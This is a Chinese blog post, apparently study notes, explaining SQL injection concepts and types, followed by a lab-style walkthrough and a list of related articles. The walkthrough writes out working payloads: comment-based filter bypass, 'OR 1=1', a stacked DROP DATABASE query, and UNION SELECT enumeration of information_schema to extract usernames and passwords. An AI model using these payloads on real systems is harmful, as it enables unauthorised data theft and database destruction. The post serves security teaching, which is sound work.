SQL Injection

最新推荐文章于 2025-02-12 15:37:01 发布
最新推荐文章于 2025-02-12 15:37:01 发布
阅读量134 收藏
点赞数
文章标签: sql 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_51800262/article/details/129951228
版权
SQL注入是一种常见的安全漏洞,发生在应用程序与数据库交互时,允许攻击者通过构造恶意SQL语句来获取或篡改敏感信息。这种攻击可以通过GET或POST方法提交,即使在前后端分离的系统中,只要服务端处理不当,仍可能发生。SQL注入的类型包括布尔型、联合查询、基于时间和报错型等,可能导致数据泄露、权限提升甚至数据库破坏。防止SQL注入的关键在于对用户输入进行严格验证和过滤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入漏洞:

SQL概念

SQL是用于参考数据库的语言
SQL:结构化查询语言

SQL注入概念

发生于应用程序与数据库层的安全漏洞。
网站内部直接发送的SQL请求一般不会有危险,但实际情况需要结合用户的输入数据动态构造SQL语句。
如果用户输入被构造成恶意sql语句,Web应用程序对用户的输入没有做严格的判断,导致用户可用将非法的SQL语句拼接到正常的语句中,被当作SQL语句的一部分执行。

在输入的字符串中注入SQL指令,在设计不良的程序中忽略了字符检查,这些恶意指令就会被数据库服务器误认为是正常的SQL指令二运行,因此遭到破坏或者入侵。

get型SQL注入漏洞

提交网页时,主要分为get post方法,
get方法提交的内容会显现在网页URL上,通过对URL连接进行构造,可以获得超出权限的信息内容。

web程序三层架构

  1. 界面层
  2. 业务逻辑层
  3. 数据访问层

image.png
前后端不分离:
8ea70ce413e88a520e332d33536f0e9.jpg
前端&服务器端:
91bc528b6b78452fc4f956a11cbca39.jpg

sql注入发生在哪?

在服务器与数据库进行交互的阶段

如果前后端分立,没有表示层-前端那一块,能否进行SQL注入?

可以,只要服务端与数据库进行交互,服务端甩出去给API(比如:http://localhost:8080/login)
SQL注入,没有网页,也能注入。

API

API:Application Programming Interface,应用程序编程接口。
是一些预先定义的函数,目的是提供应用程序与开发人员基于某软件或硬件得以访问一组例程的能力,而又无需访问源码,或理解内部工作机制的细节。

sql注入原理

SELECT * FROM t1 WHERE id = %s;
用户输入:1 or 1 = 1
实际上SQL:SELECT * FROM t1 WHERE id =1 OR 1 = 1;

f4f9b9e38a580d2e064a59095d30ad1.jpg
1.用户,键入:' UNION SELECT username , password FROM users --
这个人已经确定有两个字段;username 和password
并且确认了库里有一张表叫users
2.提交到网页,submit
3.向上走,本身的sql是:SELECT name,description FROM products WHERE category ='Gifts'
4.union后,到数据库里执行,把数据库里,所有passwords、usernames拿出来,到前端页面。

SQL注入类型

Boolean-Base Blind布尔型注入
Union联合查询注入
Time-Bases Blind基于时间延迟注入
Error-Bases报错型注入
Stacked queries堆叠注入

SQL注入带来的威胁

  1. 猜解后台数据库,盗取网页敏感信息
  2. 绕过验证登录网站后台
  3. 借助数据库的存储过程进行提权等操作

SQL注入演示

image.png
image.png
输入Gifts' -- 这个单引号是为了闭合字符串前一个单引号,并且把后面的内容都注释掉(注意:–后面有空格)
这里等同于Gifts'#
image.png
image.png
如果不注入:
image.png
注入后-获取隐藏数据:
image.png

分析–拿到类型为gifts,包含未发布商品

image.png
image.png

如果是陌生网站,怎么办?

直接输入一个单引号,回车,f12检查
image.png
找response:
image.png
如果提示我sql语法有问题,百分百这个网站有SQL漏洞。
image.png两个引号没错,三个一定错

分析–拿到所有商品,所有content

不管输入什么,比如输入aaaaa
sql语句为:SELECT id,NAME,content,relessed FROM products WHERE category = 'aaaaa' AND released = 0;

在where前面注释不可能,只能在category的内容去注释
要去改变sql的逻辑
可以输入:Gifts’or 1=1 –

SELECT * FROM products WHERE category = ‘Gifts’ OR 1 = 1 – ‘ AND released = 0;

如何删库

DROP DATABASE products;
输入:a';drop database products;
输入两条语句。

拿到所有用户名和密码并登录系统

找到返回字段个数,使用union select1,2,一直去尝试,如果报
输入Gifts' union select 1,2#
检查中报错–response-数量不一致
输入Gifts' union select 1,2,3,4#
已经把1,2,3,4都注入进去,如图
77d73a8c1559fd0e5892798265cb1c2.jpg
输入Gifts' union select 1,database(),3,4#
对应name为sql_inject,为数据库名称
3-替换为version(),name对应为5.7.33
3-替换为user(),name对应用户为root@121.40.114.23(暴露出数据库存放的服务器)
有了数据库的名,就可以拿到库里面的表,拿到了表,就可以拿到其中的字段
1' union select 1,database(),table_name,4 from information_schema.tables where table_schema=database()--
可以拿到数据库中两张表的名称–products和user
user是我们要利用的表,拿出其中所有的字段
需要username及password
1' union select 1,database(),column_name,4 from information_schema.columns where table_name='user'--
得到很多content,有host、User、很多权限、。。。、最下面有id,user_name,password
权限经常在select user,host from mysql.user看到,也就是说查错表了
加一个限制条件:1' union select 1,database(),column_name,4 from information_schema.columns where table_name='user'and table_schema=database--
精确查出id,user_name,password三个字段
1'union select 1,user_name,password,4 from user #
得到答案:name以及对应的content密码(密码可能有加密–32位md5加密,aes加密)

SQL注入方式

  • 检索隐藏数据
  • 修改应用程序逻辑
  • Union attack
  • 获取敏感数据
  • 盲注
Jarrery
关注
SQL注入(SQL Injection
weixin_45880844的博客
04-09 343
SQL注入是一种常见的网络安全攻击手段,攻击者通过在输入字段中插入恶意的SQL代码,试图干扰或篡改数据库的查询逻辑,从而获取、篡改或删除数据库中的数据。攻击者通过插入特定的SQL语句,观察应用程序的响应(通常是页面内容的变化),从而判断SQL语句是否被正确执行。如果页面显示“未找到用户”,说明SQL语句被正确执行,攻击者可以通过这种方式逐字猜测数据库中的数据。攻击者通过插入特定的SQL语句,使数据库执行耗时操作,从而判断SQL语句是否被正确执行。对用户输入进行严格的验证,确保输入符合预期的格式。
Oracle SQL injection(SQL注入)
zxrhhm的博客
09-18 1382
Oracle SQL injection(SQL注入)
网络攻击技术开篇——SQL Injection
weixin_30580341的博客
12-31 367
1.1.1 摘要 日前,国内最大的程序员社区优快云网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。 网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”...
web安全-----sql注入(一)
magic_faker的博客
01-14 658
sql注入的概念 ==SQLI,sql injection==,我们称之为 sql 注入。Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用 sql 语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,并没有仔细考虑用户提交的数据是否合法,导致提交的恶意代码直接执行。在web安全中,产生的漏洞比如xss,文件上传,命令执行漏洞产生的原因都是注入恶意
SQL InjectionSQL注入)介绍及SQL Injection攻击检测工具
周公(周金桥)的专栏
08-06 1万+
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛砖引玉的作用 一、SQL Injection的原理 SQL Injection的实现方法和破坏作用有很多,但万变不离其宗,其原理可以概括为一句话 :SQL Injection就是向服务器端提交事先
SQL注入原理讲解,很不错!
热门推荐
stilling2006的专栏
01-21 39万+
原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区优快云网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。 网络安全成为了现在互联网的焦点,
URL详解和渗透之SQL注入
Xiaokeo的博客
12-07 5404
渗透之SQL注入等相关知识整理          WEB注入,就是在网页中寻找相应得注点,如在页头、logo、栏目页、超链接等。当找到相应的注点,接下来就是进入数据库判断登录密码等获取对应的权限,想要完场这些,首先要弄懂的是URL链接语法,下面就是HTTP网页的URL的详细介绍: 1. HTTP网页URL链接语法介绍 HTTP简介:        &
Advanced SQL Injection.ppt
10-27
本讲座“Advanced SQL Injection”由Joe McCray主讲,深入探讨了SQL注入的高级技术,包括背景、基本攻击方法、实战案例、权限升级、过滤与入侵防御系统(IDS)规避、JavaScript验证以及服务器端过滤等主题。...
SQL Injection Pocket Reference.docx
03-24
SQL注入(SQL Injection)是一种常见的网络安全问题,主要发生在Web应用程序中,攻击者通过在输入字段中插入恶意的SQL代码,以获取未经授权的数据访问或控制数据库。《SQL Injection Pocket Reference》文档详细介绍...
SQL Injection with MySQL 注入分析
09-14
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统,如MySQL。此技术允许攻击者通过输入恶意SQL代码来操纵或获取数据库中的敏感信息。本文将深入探讨MySQL数据库SQL注入问题,以及...
图解HTTP----web的攻击技术
xuan的博客
08-16 653
一、概述 互联网上的攻击大都将Web站点作为目标。 二、针对Web的攻击技术 (1)简单的HTTP协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击对象。 (2)应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标。 (3)HTTP 不具备必要的安全功能 几乎现今所有的 Web 网站都会使用会话(session)管理、加密处理等安全性方面的功能,...
网络安全 - SQL Injection
2401_88750910的博客
12-09 1085
日前,国内最大的程序员社区优快云网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以我想通过专题博文介绍一些常用的攻击技术和防范策略。
[SQL 注入漏洞 · 漏洞介绍] SQL 注入概述
Blue17 の 小窝
10-15 2275
SQL 注入就是指Web 应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是可控的,并且参数会带入到数据库中执行,导致攻击者可以通过构造不同的 SQL 语句来实现对数据库进行任意操作的一种攻击方式。
SQL 注入(SQL Injection)学习心得
coldsummer23的博客
11-07 3325
网工小白学习安全心得,学习web渗透第一章sql注入,本文仅仅简单介绍了SQL注入的流程,SQL注入的原理,以一次完整的字符型SQL注入流程为例,其余三种都是基于这个思路,只是应对于不同的防护用不同的手段。思路重点在于明白最终想要的是数据库中的内容,怎么一步步去获得里面的数据。
SQL注入(入门)
最新发布
2301_81188416的博客
02-12 1341
SQL 注入(SQL Injection)是一种常见的 Web 攻击方式,攻击者通过构造恶意 SQL 语句,将其注入到应用程序中,从而操纵数据库执行非授权操作。这种攻击可能导致敏感数据泄露、数据篡改、甚至服务器被完全控制。
反制SQL注入的方案(SQL Injection Attack)
afterain的专栏
06-01 2399
转自 http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspxSQL Injection Attack(Special thanks to Neil Carpenter for helping out on this blog post)Recent TrendsBeginning lat
url存在链接注入漏洞_检测到目标URL存在SQL注入漏洞
weixin_39939661的博客
12-22 1796
解决办法防护建议包括部署分层安全措施(包括在接受用户输入时使用参数化的查询)、确保应用程序仅使用预期的数据、加固数据库服务器防止不恰当的访问数据。建议使用以下措施防范SQL注入漏洞:对于开发========使用以下建议编写不受SQL注入***影响的web应用。参数化查询:SQL注入源于***者控制查询数据以修改查询逻辑,因此防范SQL注入***的最佳方式就是将查询的逻辑与其数据分隔,这可以防止执行...
SQL注入(SQL Injection)总结
野原新之助
02-04 980
产生原因: - 构建的SQL语句中包含了不被信任的数据,如用户输入信息等,但是又没有做安全防范。
一种很厉害的SQL注入攻击
云上的日子
08-30 1875
explain select * from user where mail= 'IF(SUBSTR(@@version,1,1) 以上SQL适应性,攻击性都非常强, 简单有效!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值